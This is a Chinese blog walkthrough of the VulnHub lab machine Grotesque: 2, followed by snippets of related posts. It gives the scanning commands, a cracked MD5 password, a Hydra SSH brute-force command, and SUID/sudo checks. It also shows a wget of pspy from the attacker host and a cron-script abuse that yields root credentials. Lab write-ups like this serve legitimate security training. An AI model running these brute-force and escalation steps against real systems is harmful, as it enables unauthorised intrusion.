靶机16 GROTESQUE: 2

已于 2024-09-02 11:32:02 修改
阅读量1.1k 收藏 3
点赞数 1
分类专栏: # 靶机 文章标签: ssh 服务器 java
于 2022-10-12 14:23:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/127282004
版权

简介:获取标志(难度: 中等)

1、下载靶场

靶机名称:GROTESQUE: 2

下载地址:

Grotesque: 2 ~ VulnHub

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 grotesque login 时表示安装成功)。

3、获取靶机的flag(两个flag)

前提:

1、已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

2、grotesque和kali在同一网段 | 已知grotesque所在的网段

—— grotesque  IP地址:192.168.108.157/24

信息收集

获取grotesque的IP地址

命令:netdiscover -r 192.168.108.157/24

由图可知grotesque的IP地址是:192.168.108.157/24

端口扫描

命令:nmap -sV -p- -O 192.168.108.157

//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描

很奇怪,这个靶机开了500+个都端口,随便查看了一下各个端口的服务,,发现显示图片和源代码都是一样的

这里需要进行比对wget去把这些页面下载下来看一下文件是否有区别

for i in {23..556};do wget 192.168.108.157:$i -O index$i;done

按照文件大小进行排序,明显最后一个的大小有问题,查看一下256端口

ls -al | sort

在258都那口获取到提示信息

SSH:satan、raphael、 angel、distress、greed、lust

在第二行的图片上面有了发现,虽然有点费眼睛,但是得到一串hash值

再根据提示将hash-100,最后获得hash:b6e705ea1249e2bb7b01d7dac91cd0b3

通过md5解密(https://www.somd5.com/)获得密码:solomon1

使用密码:solomon1和账号:satan、raphael、angel、distress、greed、lust 对ssh进行暴力破解

hydra -L /root/Desktop/g2_user -p solomon1 ssh://192.168.108.157

获取到一组账号密码(angel、solomon1):

[22][ssh] host: 192.168.108.157   login: angel   password: solomon1

使用账号密码(angel、solomon1)ssh登录之后在当前目录下获取到第一个flag

查看是否存在和sudo提权suid提权

sudo -l

find / -perm -4000 2>/dev/null

上传一个pspy64看一下有什么计划任务

python2 -m SimpleHTTPServer 9999

wget http://192.168.108.129:9999/pspy64s

chmod 7777 pspy64s

./pspy64s

发现差不多每一分钟就会运行write.sh脚本和check.sh脚本

猜测之前发现 /home/angel/quiet 文件夹中有会多文件会不会就是这个脚本写的

删除quiet目录下所有文件后 ,发现在一分钟左右又会重新写入一堆东西,而且在删除之后发现根目录下新出现一个rootcreds.txt文件

应该是要写文件但是目录满了,所以需要把quiet目录下文件全部删除了才会出现rootcreds.txt文件,查看之后获得了root的密码:sweetchild

使用账号密码(root、sweetchild)切换到root账号,,在root的家目录下发现了第二个flag

点击下方名片,加入GG安全团队,期待师傅们的加入,一起学习一起成长。

xjizhi(GG安全)
关注
专栏目录
靶机:Funbox: Scriptkiddie
weixin_50339323的博客
09-14 430
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
靶机 Hacknos:1
m0_51811529的博客
08-30 494
靶机1
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:2
Aluxian_的博客
09-17 431
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Grotesque系列一共有3个靶机,分别是1.2.3老样子需要获得root权限找到flagmedium1.信息收集后台扫描工具,主要是一个图片的隐写2.工具的使用john,hydraSSH登入3.提权check.sh运行时,在中执行ls命令,如果没有文件,则将root creds写入/目录下名为。
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 599
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
VulnHub靶场----grotesque3
qq_61670993的博客
10-19 469
本人小菜鸡,希望一起学习进步!
靶机17 GROTESQUE: 3.0.1
honest_gg的博客
10-12 1228
简介:获取标志(难度: 中等)
kali获取任意设备的位置信息
ztK63LrD的博客
04-23 6297
kali获取位置信息
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1194
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
vulnhub靶机-CyberSploit:2渗透笔记
liver100day的博客
07-30 593
文章1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 目录爆破3.漏洞利用3.1 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:CyberSploit:2 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/cybersploit-2,511/ 2.信息收集 2.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC
kali 的桥接模式下,查询获取IP地址
m0_74634242的博客
11-12 836
手机热点通常用DHCP服务器来为连接到热点的设备分配IP地址,桥接模式下,虚拟机可以通过与无线网络连接的DHCP服务器获取IP地址,然后手机一般不防御和检查,比如mac地址是否一致,因此Kali虚拟机能够成功获取IP地址。不然ifconfig的结果不变,我是用ifconfig eth0(网卡名) down/up来,关闭和重启网卡。使用ifconfig down/up 前需要加sudo,连上手机热点后,手机热点一般不会限制访问。2.阻止kali获取IP地址。
kali下使用seek追踪定位IP地址(渗透笔记)
最新发布
weixin_43899811的博客
11-27 2126
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
kali与靶机网络配置问题
leo788的博客
01-04 3746
前提:kali宿主机和靶机都使用的NAT网络配置,然而无论是arp-scan还是nmap还是netdiscover都找不到靶机ip,正常情况下可以找到。
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 734
Pinkys-Place
【渗透测试】基于Kali Linux的信息收集(Information Gathering)指令介绍
m0_38096164的博客
09-29 1049
基于Kali linux 的信息收集(information gathering)指令介绍
DC-1靶机的渗透学习
里丘~班诺的小屋
08-31 2788
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
基于Kali搭建SSH弱口令靶机并用Nmap实现排查
晓梦林的博客
05-03 2880
基于Kali搭建SSH弱口令靶机并用Nmap实现排查
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
kali linux 获取ip_Kali Linux该怎么进行网络配置?
weixin_42521032的博客
12-29 715
Kali Linux安装好后,很多人不知道怎么配置网络,本文以校园网的静态IP为例,给大家介绍下Kali Linux的网络配置方法,一起来学习下吧。kali安装完成之后,首先确定你是DHCP还是静态IP。DHCP是用来给大型网络动态分配IP的协议,而大部分中小型网络(如校园网、家庭网络)都是采用网络管理员手工分配静态IP的方法来确定IP地址的。一、 在文件系统里找到/etc/network下的in...
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值